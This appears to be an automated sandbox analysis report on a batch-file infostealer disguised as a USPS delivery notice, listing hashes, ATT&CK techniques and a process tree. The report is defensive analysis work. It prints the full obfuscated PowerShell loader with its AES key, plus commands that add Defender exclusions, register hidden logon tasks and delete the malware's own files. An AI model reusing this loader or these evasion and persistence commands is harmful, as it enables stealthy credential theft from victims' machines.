2935e73a76b190dc5d81ecec475f9b1559e61fdff3f56e9c52f7dcde6a0b9627

Analysis

max time kernel
91s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
22/03/2023, 14:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat
Size

235KB
MD5

fb5791ff7ad2148b8df7a4e351e46842
SHA1

55b68f7462e2c034ad3220b1096578c9a8697a34
SHA256

f590b5d9c60f27f88ee136632a4b34d037ff271dc55275b4cff859bd48eb06f2
SHA512

8f42f02f8c09c35f491b62ed30e26ae413c9a9c2e20d473bb8d8724f1446f95a62a1e91d77e7d0abfd0053f9fa26f2080bfbf9df5123f81f5768c543c9b8a790
SSDEEP

3072:oE7glwQ922cFBB5HM5cez7osBGlCipzFqVlk3tIexSnj+wVC1UbweKeWDZmTrr/M:nglwK22KBBIceQsBGysxxcgXZwrr5MZX

Score

7^/10

spyware stealer

Malware Config

Signatures

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	JBrYt.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	wofhho.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	URzNA.bat.exe

Executes dropped EXE 4 IoCs

pid	Process
3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe
2944	JBrYt.bat.exe
2640	wofhho.bat.exe
3320	URzNA.bat.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings	wofhho.bat.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1764	powershell.exe
1764	powershell.exe
3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe
3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe
3332	powershell.exe
3136	powershell.exe
3332	powershell.exe
3136	powershell.exe
3136	powershell.exe
3332	powershell.exe
3332	powershell.exe
2000	powershell.exe
2000	powershell.exe
2000	powershell.exe
1064	powershell.exe
1064	powershell.exe
1064	powershell.exe
4936	powershell.exe
4936	powershell.exe
4936	powershell.exe
2944	JBrYt.bat.exe
2944	JBrYt.bat.exe
3452	powershell.exe
3452	powershell.exe
3752	powershell.exe
3752	powershell.exe
3452	powershell.exe
3752	powershell.exe
3452	powershell.exe
3452	powershell.exe
940	powershell.exe
940	powershell.exe
940	powershell.exe
1828	powershell.exe
1828	powershell.exe
1828	powershell.exe
2640	wofhho.bat.exe
2640	wofhho.bat.exe
2640	wofhho.bat.exe
1080	powershell.exe
1080	powershell.exe
320	powershell.exe
320	powershell.exe
1080	powershell.exe
320	powershell.exe
1080	powershell.exe
1080	powershell.exe
2800	powershell.exe
2800	powershell.exe
2800	powershell.exe
4180	powershell.exe
4180	powershell.exe
4180	powershell.exe
2220	powershell.exe
2220	powershell.exe
2220	powershell.exe
3320	URzNA.bat.exe
3320	URzNA.bat.exe
5048	powershell.exe
976	powershell.exe
976	powershell.exe
5048	powershell.exe
5048	powershell.exe
976	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeDebugPrivilege	3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe
Token: SeDebugPrivilege	3136	powershell.exe
Token: SeDebugPrivilege	3332	powershell.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeIncreaseQuotaPrivilege	2000	powershell.exe
Token: SeSecurityPrivilege	2000	powershell.exe
Token: SeTakeOwnershipPrivilege	2000	powershell.exe
Token: SeLoadDriverPrivilege	2000	powershell.exe
Token: SeSystemProfilePrivilege	2000	powershell.exe
Token: SeSystemtimePrivilege	2000	powershell.exe
Token: SeProfSingleProcessPrivilege	2000	powershell.exe
Token: SeIncBasePriorityPrivilege	2000	powershell.exe
Token: SeCreatePagefilePrivilege	2000	powershell.exe
Token: SeBackupPrivilege	2000	powershell.exe
Token: SeRestorePrivilege	2000	powershell.exe
Token: SeShutdownPrivilege	2000	powershell.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeSystemEnvironmentPrivilege	2000	powershell.exe
Token: SeRemoteShutdownPrivilege	2000	powershell.exe
Token: SeUndockPrivilege	2000	powershell.exe
Token: SeManageVolumePrivilege	2000	powershell.exe
Token: 33	2000	powershell.exe
Token: 34	2000	powershell.exe
Token: 35	2000	powershell.exe
Token: 36	2000	powershell.exe
Token: SeDebugPrivilege	1064	powershell.exe
Token: SeIncreaseQuotaPrivilege	1064	powershell.exe
Token: SeSecurityPrivilege	1064	powershell.exe
Token: SeTakeOwnershipPrivilege	1064	powershell.exe
Token: SeLoadDriverPrivilege	1064	powershell.exe
Token: SeSystemProfilePrivilege	1064	powershell.exe
Token: SeSystemtimePrivilege	1064	powershell.exe
Token: SeProfSingleProcessPrivilege	1064	powershell.exe
Token: SeIncBasePriorityPrivilege	1064	powershell.exe
Token: SeCreatePagefilePrivilege	1064	powershell.exe
Token: SeBackupPrivilege	1064	powershell.exe
Token: SeRestorePrivilege	1064	powershell.exe
Token: SeShutdownPrivilege	1064	powershell.exe
Token: SeDebugPrivilege	1064	powershell.exe
Token: SeSystemEnvironmentPrivilege	1064	powershell.exe
Token: SeRemoteShutdownPrivilege	1064	powershell.exe
Token: SeUndockPrivilege	1064	powershell.exe
Token: SeManageVolumePrivilege	1064	powershell.exe
Token: 33	1064	powershell.exe
Token: 34	1064	powershell.exe
Token: 35	1064	powershell.exe
Token: 36	1064	powershell.exe
Token: SeIncreaseQuotaPrivilege	1064	powershell.exe
Token: SeSecurityPrivilege	1064	powershell.exe
Token: SeTakeOwnershipPrivilege	1064	powershell.exe
Token: SeLoadDriverPrivilege	1064	powershell.exe
Token: SeSystemProfilePrivilege	1064	powershell.exe
Token: SeSystemtimePrivilege	1064	powershell.exe
Token: SeProfSingleProcessPrivilege	1064	powershell.exe
Token: SeIncBasePriorityPrivilege	1064	powershell.exe
Token: SeCreatePagefilePrivilege	1064	powershell.exe
Token: SeBackupPrivilege	1064	powershell.exe
Token: SeRestorePrivilege	1064	powershell.exe
Token: SeShutdownPrivilege	1064	powershell.exe
Token: SeDebugPrivilege	1064	powershell.exe
Token: SeSystemEnvironmentPrivilege	1064	powershell.exe
Token: SeRemoteShutdownPrivilege	1064	powershell.exe
Token: SeUndockPrivilege	1064	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4912 wrote to memory of 1764	4912	cmd.exe	86
PID 4912 wrote to memory of 1764	4912	cmd.exe	86
PID 4912 wrote to memory of 3440	4912	cmd.exe	88
PID 4912 wrote to memory of 3440	4912	cmd.exe	88
PID 4912 wrote to memory of 3440	4912	cmd.exe	88
PID 3440 wrote to memory of 3332	3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe	93
PID 3440 wrote to memory of 3332	3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe	93
PID 3440 wrote to memory of 3332	3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe	93
PID 3440 wrote to memory of 3136	3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe	95
PID 3440 wrote to memory of 3136	3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe	95
PID 3440 wrote to memory of 3136	3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe	95
PID 3440 wrote to memory of 2000	3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe	100
PID 3440 wrote to memory of 2000	3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe	100
PID 3440 wrote to memory of 2000	3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe	100
PID 3440 wrote to memory of 1064	3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe	102
PID 3440 wrote to memory of 1064	3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe	102
PID 3440 wrote to memory of 1064	3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe	102
PID 3440 wrote to memory of 4500	3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe	104
PID 3440 wrote to memory of 4500	3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe	104
PID 3440 wrote to memory of 4500	3440	Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe	104
PID 4500 wrote to memory of 4812	4500	WScript.exe	105
PID 4500 wrote to memory of 4812	4500	WScript.exe	105
PID 4500 wrote to memory of 4812	4500	WScript.exe	105
PID 4812 wrote to memory of 4936	4812	cmd.exe	107
PID 4812 wrote to memory of 4936	4812	cmd.exe	107
PID 4812 wrote to memory of 4936	4812	cmd.exe	107
PID 4812 wrote to memory of 2944	4812	cmd.exe	108
PID 4812 wrote to memory of 2944	4812	cmd.exe	108
PID 4812 wrote to memory of 2944	4812	cmd.exe	108
PID 2944 wrote to memory of 3452	2944	JBrYt.bat.exe	109
PID 2944 wrote to memory of 3452	2944	JBrYt.bat.exe	109
PID 2944 wrote to memory of 3452	2944	JBrYt.bat.exe	109
PID 2944 wrote to memory of 3752	2944	JBrYt.bat.exe	111
PID 2944 wrote to memory of 3752	2944	JBrYt.bat.exe	111
PID 2944 wrote to memory of 3752	2944	JBrYt.bat.exe	111
PID 2944 wrote to memory of 940	2944	JBrYt.bat.exe	114
PID 2944 wrote to memory of 940	2944	JBrYt.bat.exe	114
PID 2944 wrote to memory of 940	2944	JBrYt.bat.exe	114
PID 2944 wrote to memory of 4132	2944	JBrYt.bat.exe	120
PID 2944 wrote to memory of 4132	2944	JBrYt.bat.exe	120
PID 2944 wrote to memory of 4132	2944	JBrYt.bat.exe	120
PID 4132 wrote to memory of 1828	4132	cmd.exe	123
PID 4132 wrote to memory of 1828	4132	cmd.exe	123
PID 4132 wrote to memory of 1828	4132	cmd.exe	123
PID 4132 wrote to memory of 2640	4132	cmd.exe	124
PID 4132 wrote to memory of 2640	4132	cmd.exe	124
PID 4132 wrote to memory of 2640	4132	cmd.exe	124
PID 2640 wrote to memory of 1080	2640	wofhho.bat.exe	127
PID 2640 wrote to memory of 1080	2640	wofhho.bat.exe	127
PID 2640 wrote to memory of 1080	2640	wofhho.bat.exe	127
PID 2640 wrote to memory of 320	2640	wofhho.bat.exe	128
PID 2640 wrote to memory of 320	2640	wofhho.bat.exe	128
PID 2640 wrote to memory of 320	2640	wofhho.bat.exe	128
PID 2640 wrote to memory of 2800	2640	wofhho.bat.exe	130
PID 2640 wrote to memory of 2800	2640	wofhho.bat.exe	130
PID 2640 wrote to memory of 2800	2640	wofhho.bat.exe	130
PID 2640 wrote to memory of 4180	2640	wofhho.bat.exe	131
PID 2640 wrote to memory of 4180	2640	wofhho.bat.exe	131
PID 2640 wrote to memory of 4180	2640	wofhho.bat.exe	131
PID 2640 wrote to memory of 180	2640	wofhho.bat.exe	133
PID 2640 wrote to memory of 180	2640	wofhho.bat.exe	133
PID 2640 wrote to memory of 180	2640	wofhho.bat.exe	133
PID 180 wrote to memory of 3212	180	WScript.exe	134
PID 180 wrote to memory of 3212	180	WScript.exe	134

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w hidden -c #
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1764
- C:\Users\Admin\AppData\Local\Temp\Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe
  "C:\Users\Admin\AppData\Local\Temp\Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe" function Xy($b){$b.Replace('vSmGw', '')}$LLEF=Xy 'EnvSmGwtrvSmGwyvSmGwPovSmGwintvSmGw';$OrsV=Xy 'FromvSmGwBasevSmGw64vSmGwStvSmGwrivSmGwngvSmGw';$RFsr=Xy 'RevSmGwadvSmGwLinevSmGwsvSmGw';$QLig=Xy 'InvSmGwvokvSmGwevSmGw';$VRXb=Xy 'TranvSmGwsfovSmGwrvSmGwmFvSmGwivSmGwnalvSmGwBlvSmGwockvSmGw';$tKVa=Xy 'CvSmGwrvSmGwevSmGwatevSmGwDecrvSmGwypvSmGwtovSmGwrvSmGw';$CoSN=Xy 'LvSmGwovSmGwadvSmGw';$YJoi=Xy 'GvSmGwevSmGwtCvSmGwurrvSmGwenvSmGwtPvSmGwrvSmGwocevSmGwssvSmGw';$BTxw=Xy 'FvSmGwirstvSmGw';$tQgl=Xy 'ChvSmGwanvSmGwgvSmGweEvSmGwxvSmGwtevSmGwnsivSmGwonvSmGw';function MHOHE($oVxEr){$OpvpD=[System.Security.Cryptography.Aes]::Create();$OpvpD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OpvpD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OpvpD.Key=[System.Convert]::$OrsV('Z1w0C4VfFltAxFc5GtH6GgxG5WWF9jPI0I/rvgBH6DQ=');$OpvpD.IV=[System.Convert]::$OrsV('HnFST6ASK8sXXV+1L3SdHw==');$vcVSb=$OpvpD.$tKVa();$bhuUY=$vcVSb.$VRXb($oVxEr,0,$oVxEr.Length);$vcVSb.Dispose();$OpvpD.Dispose();$bhuUY;}function DwQRM($oVxEr){$mhOnd=New-Object System.IO.MemoryStream(,$oVxEr);$JLVWL=New-Object System.IO.MemoryStream;$mIqqp=New-Object System.IO.Compression.GZipStream($mhOnd,[IO.Compression.CompressionMode]::Decompress);$mIqqp.CopyTo($JLVWL);$mIqqp.Dispose();$mhOnd.Dispose();$JLVWL.Dispose();$JLVWL.ToArray();}function rgAct($oVxEr,$XYsts){[System.Reflection.Assembly]::$CoSN([byte[]]$oVxEr).$LLEF.$QLig($null,$XYsts);}$pEjBI=[System.Linq.Enumerable]::$BTxw([System.IO.File]::$RFsr([System.IO.Path]::$tQgl([System.Diagnostics.Process]::$YJoi().MainModule.FileName, $null)));$GLqbd = $pEjBI.Substring(3).Split('\');$dXjNK=DwQRM (MHOHE ([Convert]::$OrsV($GLqbd[0])));$EobPQ=DwQRM (MHOHE ([Convert]::$OrsV($GLqbd[1])));rgAct $EobPQ $null;rgAct $dXjNK $null;
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3440
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3440);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3332
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3136
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\Fwd_USPS_Expected_Delivery_on_Monday_20231111')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2000
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_JBrYt' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\JBrYt.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1064
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\JBrYt.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4500
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\JBrYt.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4812
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -w hidden -c #
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4936
    - - C:\Users\Admin\AppData\Roaming\JBrYt.bat.exe
        
        "C:\Users\Admin\AppData\Roaming\JBrYt.bat.exe" function Xy($b){$b.Replace('vSmGw', '')}$LLEF=Xy 'EnvSmGwtrvSmGwyvSmGwPovSmGwintvSmGw';$OrsV=Xy 'FromvSmGwBasevSmGw64vSmGwStvSmGwrivSmGwngvSmGw';$RFsr=Xy 'RevSmGwadvSmGwLinevSmGwsvSmGw';$QLig=Xy 'InvSmGwvokvSmGwevSmGw';$VRXb=Xy 'TranvSmGwsfovSmGwrvSmGwmFvSmGwivSmGwnalvSmGwBlvSmGwockvSmGw';$tKVa=Xy 'CvSmGwrvSmGwevSmGwatevSmGwDecrvSmGwypvSmGwtovSmGwrvSmGw';$CoSN=Xy 'LvSmGwovSmGwadvSmGw';$YJoi=Xy 'GvSmGwevSmGwtCvSmGwurrvSmGwenvSmGwtPvSmGwrvSmGwocevSmGwssvSmGw';$BTxw=Xy 'FvSmGwirstvSmGw';$tQgl=Xy 'ChvSmGwanvSmGwgvSmGweEvSmGwxvSmGwtevSmGwnsivSmGwonvSmGw';function MHOHE($oVxEr){$OpvpD=[System.Security.Cryptography.Aes]::Create();$OpvpD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OpvpD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OpvpD.Key=[System.Convert]::$OrsV('Z1w0C4VfFltAxFc5GtH6GgxG5WWF9jPI0I/rvgBH6DQ=');$OpvpD.IV=[System.Convert]::$OrsV('HnFST6ASK8sXXV+1L3SdHw==');$vcVSb=$OpvpD.$tKVa();$bhuUY=$vcVSb.$VRXb($oVxEr,0,$oVxEr.Length);$vcVSb.Dispose();$OpvpD.Dispose();$bhuUY;}function DwQRM($oVxEr){$mhOnd=New-Object System.IO.MemoryStream(,$oVxEr);$JLVWL=New-Object System.IO.MemoryStream;$mIqqp=New-Object System.IO.Compression.GZipStream($mhOnd,[IO.Compression.CompressionMode]::Decompress);$mIqqp.CopyTo($JLVWL);$mIqqp.Dispose();$mhOnd.Dispose();$JLVWL.Dispose();$JLVWL.ToArray();}function rgAct($oVxEr,$XYsts){[System.Reflection.Assembly]::$CoSN([byte[]]$oVxEr).$LLEF.$QLig($null,$XYsts);}$pEjBI=[System.Linq.Enumerable]::$BTxw([System.IO.File]::$RFsr([System.IO.Path]::$tQgl([System.Diagnostics.Process]::$YJoi().MainModule.FileName, $null)));$GLqbd = $pEjBI.Substring(3).Split('\');$dXjNK=DwQRM (MHOHE ([Convert]::$OrsV($GLqbd[0])));$EobPQ=DwQRM (MHOHE ([Convert]::$OrsV($GLqbd[1])));rgAct $EobPQ $null;rgAct $dXjNK $null;
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2944
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2944);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3452
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3752
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\JBrYt')
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:940
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wofhho.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -w hidden -c #
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1828
        
        C:\Users\Admin\AppData\Local\Temp\wofhho.bat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wofhho.bat.exe" function zD($y){$y.Replace('UAuxu', '')}$MMBl=zD 'EnUAuxutryUAuxuPoiUAuxunUAuxutUAuxu';$FoTB=zD 'CreUAuxuateUAuxuDeUAuxucUAuxurUAuxuyUAuxuptUAuxuorUAuxu';$DTws=zD 'ReaUAuxudLiUAuxuneUAuxusUAuxu';$cSiX=zD 'GetUAuxuCuUAuxurUAuxurenUAuxutPUAuxuroUAuxuceUAuxussUAuxu';$JkjV=zD 'TUAuxuraUAuxunsfUAuxuorUAuxumFUAuxuinUAuxualUAuxuBlUAuxuockUAuxu';$nuIN=zD 'ChUAuxuangUAuxueEUAuxuxteUAuxunUAuxusiUAuxuonUAuxu';$tDPn=zD 'LoUAuxuadUAuxu';$oZwz=zD 'FUAuxuirsUAuxutUAuxu';$XoBe=zD 'IUAuxunvokUAuxueUAuxu';$JWho=zD 'FroUAuxumUAuxuBaUAuxuseUAuxu64SUAuxutrUAuxuiUAuxungUAuxu';function odcAj($whKbb){$tCEgG=[System.Security.Cryptography.Aes]::Create();$tCEgG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tCEgG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tCEgG.Key=[System.Convert]::$JWho('kLHaMgibybvlZ0jwGI9xY6NieHEtp0yvkhXRtTyfFaw=');$tCEgG.IV=[System.Convert]::$JWho('8T53zfFtuFURjeqan8MCfA==');$uUflA=$tCEgG.$FoTB();$DZNhZ=$uUflA.$JkjV($whKbb,0,$whKbb.Length);$uUflA.Dispose();$tCEgG.Dispose();$DZNhZ;}function uHmlq($whKbb){$IDEaY=New-Object System.IO.MemoryStream(,$whKbb);$CzFal=New-Object System.IO.MemoryStream;$eVPgC=New-Object System.IO.Compression.GZipStream($IDEaY,[IO.Compression.CompressionMode]::Decompress);$eVPgC.CopyTo($CzFal);$eVPgC.Dispose();$IDEaY.Dispose();$CzFal.Dispose();$CzFal.ToArray();}function fpxFE($whKbb,$KUByu){[System.Reflection.Assembly]::$tDPn([byte[]]$whKbb).$MMBl.$XoBe($null,$KUByu);}$GTHfb=[System.Linq.Enumerable]::$oZwz([System.IO.File]::$DTws([System.IO.Path]::$nuIN([System.Diagnostics.Process]::$cSiX().MainModule.FileName, $null)));$QGZMs = $GTHfb.Substring(3).Split('\');$RXJjA=uHmlq (odcAj ([Convert]::$JWho($QGZMs[0])));$bMlkn=uHmlq (odcAj ([Convert]::$JWho($QGZMs[1])));fpxFE $bMlkn $null;fpxFE $RXJjA $null;
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2640);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\wofhho')
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_URzNA' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\URzNA.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4180
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\URzNA.vbs"
        8⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:180
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\URzNA.bat" "
        9⤵
        
        PID:3212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -w hidden -c #
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2220
        
        C:\Users\Admin\AppData\Roaming\URzNA.bat.exe
        
        "C:\Users\Admin\AppData\Roaming\URzNA.bat.exe" function zD($y){$y.Replace('UAuxu', '')}$MMBl=zD 'EnUAuxutryUAuxuPoiUAuxunUAuxutUAuxu';$FoTB=zD 'CreUAuxuateUAuxuDeUAuxucUAuxurUAuxuyUAuxuptUAuxuorUAuxu';$DTws=zD 'ReaUAuxudLiUAuxuneUAuxusUAuxu';$cSiX=zD 'GetUAuxuCuUAuxurUAuxurenUAuxutPUAuxuroUAuxuceUAuxussUAuxu';$JkjV=zD 'TUAuxuraUAuxunsfUAuxuorUAuxumFUAuxuinUAuxualUAuxuBlUAuxuockUAuxu';$nuIN=zD 'ChUAuxuangUAuxueEUAuxuxteUAuxunUAuxusiUAuxuonUAuxu';$tDPn=zD 'LoUAuxuadUAuxu';$oZwz=zD 'FUAuxuirsUAuxutUAuxu';$XoBe=zD 'IUAuxunvokUAuxueUAuxu';$JWho=zD 'FroUAuxumUAuxuBaUAuxuseUAuxu64SUAuxutrUAuxuiUAuxungUAuxu';function odcAj($whKbb){$tCEgG=[System.Security.Cryptography.Aes]::Create();$tCEgG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tCEgG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tCEgG.Key=[System.Convert]::$JWho('kLHaMgibybvlZ0jwGI9xY6NieHEtp0yvkhXRtTyfFaw=');$tCEgG.IV=[System.Convert]::$JWho('8T53zfFtuFURjeqan8MCfA==');$uUflA=$tCEgG.$FoTB();$DZNhZ=$uUflA.$JkjV($whKbb,0,$whKbb.Length);$uUflA.Dispose();$tCEgG.Dispose();$DZNhZ;}function uHmlq($whKbb){$IDEaY=New-Object System.IO.MemoryStream(,$whKbb);$CzFal=New-Object System.IO.MemoryStream;$eVPgC=New-Object System.IO.Compression.GZipStream($IDEaY,[IO.Compression.CompressionMode]::Decompress);$eVPgC.CopyTo($CzFal);$eVPgC.Dispose();$IDEaY.Dispose();$CzFal.Dispose();$CzFal.ToArray();}function fpxFE($whKbb,$KUByu){[System.Reflection.Assembly]::$tDPn([byte[]]$whKbb).$MMBl.$XoBe($null,$KUByu);}$GTHfb=[System.Linq.Enumerable]::$oZwz([System.IO.File]::$DTws([System.IO.Path]::$nuIN([System.Diagnostics.Process]::$cSiX().MainModule.FileName, $null)));$QGZMs = $GTHfb.Substring(3).Split('\');$RXJjA=uHmlq (odcAj 